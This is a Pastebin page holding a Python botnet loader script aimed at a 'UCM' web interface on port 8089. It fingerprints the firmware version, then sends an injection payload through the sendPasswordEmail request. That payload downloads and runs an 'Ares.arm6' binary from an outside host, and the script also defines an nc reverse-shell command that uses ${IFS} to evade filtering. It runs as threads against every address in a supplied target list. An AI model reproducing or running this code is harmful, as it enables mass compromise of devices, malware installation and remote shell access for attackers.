KhaosBringer

UCM Exploit Loader.c

Nov 21st, 2020
669
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import os
  2. import re
  3. import sys
  4. import json
  5. import argparse
  6. import requests
  7. import threading
  8. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  9. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  10. # UCM Exploit Loader made by B4CKDOOR - PRIVATE #
  11. # B4CKDOORARCHIVE.CLUB #
  12.  
  13. #$top_parser = argparse.ArgumentParser(description='')
  14. #$top_parser.add_argument('--rhost', action="store", dest="rhost",
  15. #$required=True, help="The remote host to connect to")
  16. #$top_parser.add_argument('--rport', action="store", dest="rport", type=int,
  17. #$help="The remote port to connect to", default=8089)
  18. #$top_parser.add_argument('--lhost', action="store", dest="lhost",
  19. #$required=True, help="The local host to connect back to")
  20. #$top_parser.add_argument('--lport', action="store", dest="lport", type=int,
  21. #$help="The local port to connect back to", default=1270)
  22. #$args = top_parser.parse_args()
  23.  
  24.  
  25. class Loader(object):
  26.  
  27.     def infect(self, adress: str):
  28.         url = 'https://' + adress + ':' + "8089" + '/cgi'
  29.         print('[+] Sending getInfo request to ', url)
  30.  
  31.         try:
  32.             resp = requests.post(url=url, data='action=getInfo', verify=False)
  33.         except Exception:
  34.             print('[-] Error connecting to remote target')
  35.             sys.exit(1)
  36.        
  37.         if resp.status_code != 200:
  38.             print('[-] Did not get a 200 OK on getInfo request')
  39.             sys.exit(1)
  40.        
  41.         if resp.text.find('{ "response":') != 0:
  42.             print('[-] Unexpected response')
  43.             sys.exit(1)
  44.        
  45.         try:
  46.             parsed_response = json.loads(resp.text)
  47.         except Exception:
  48.             print('[-] Unable to parse json response')
  49.             sys.exit(1)
  50.        
  51.         print('[+] Remote target info: ')
  52.         print('\t-> Model: ', parsed_response['response']['model_name'])
  53.         print('\t-> Version: ', parsed_response['response']['prog_version'])
  54.        
  55.         match = re.match('^([0-9]+)\.([0-9]+)\.([0-9]+)\.([0-9]+)$',
  56.         parsed_response['response']['prog_version'])
  57.         if not match:
  58.             print('[-] Failed to extract the remote targets version')
  59.             sys.exit(1)
  60.        
  61.         major = int(match[1])
  62.         minor = int(match[2])
  63.         point = int(match[3])
  64.         patch = int(match[4])
  65.        
  66.         if (major > 1) or (major == 1 and minor > 0) or (major == 1 and minor == 0
  67.         and point > 19) or (major == 1 and minor == 0 and point == 19 and patch >=
  68.         20):
  69.             print('[-] Unaffected version')
  70.             sys.exit(1)
  71.         else:
  72.             print('[+] Vulnerable version!')
  73.  
  74.         print("[+] loaded, %s" %(adress))
  75.         try:
  76.             exploit = "admin\' or 1=1--`;cd /var/; wget http://1.3.3.7/Ares.arm6 ; chmod 777 Ares.arm6 ; ./Ares.arm6 ARES" #arm7
  77.             exploit2 = 'admin\' or 1=1--`;`nc${IFS}' + "1.3.3.7" + '${IFS}' + "1270" + '${IFS}-e${IFS}/bin/sh`;`'
  78.             resp = requests.post(url=url,
  79.         data='action=sendPasswordEmail&user_name=' + exploit, verify=False)
  80.         except Exception as err:
  81.             print('[-] Failed to send payload')
  82.             sys.exit(1)
  83.        
  84.         if resp.status_code != 200:
  85.             print('[-] Did not get a 200 OK on sendPasswordEmail request')
  86.             sys.exit(1)
  87.        
  88.         try:
  89.             parsed_response = json.loads(resp.text)
  90.         except Exception:
  91.             print('[-] Unable to parse json response')
  92.             sys.exit(1)
  93.        
  94.         if parsed_response['status'] == 0:
  95.             print('[+] Success! Clean exit.')
  96.         else:
  97.             print('[-] Something bad happened.')
  98.            
  99.     def __init__(self, adress: str):
  100.         self.infect(adress)
  101.  
  102. with open(sys.argv[1], "r") as f:
  103.     for item in f.readlines():
  104.         threading.Thread(target=Loader, args=(item.rstrip(), )).start()
RAW Paste Data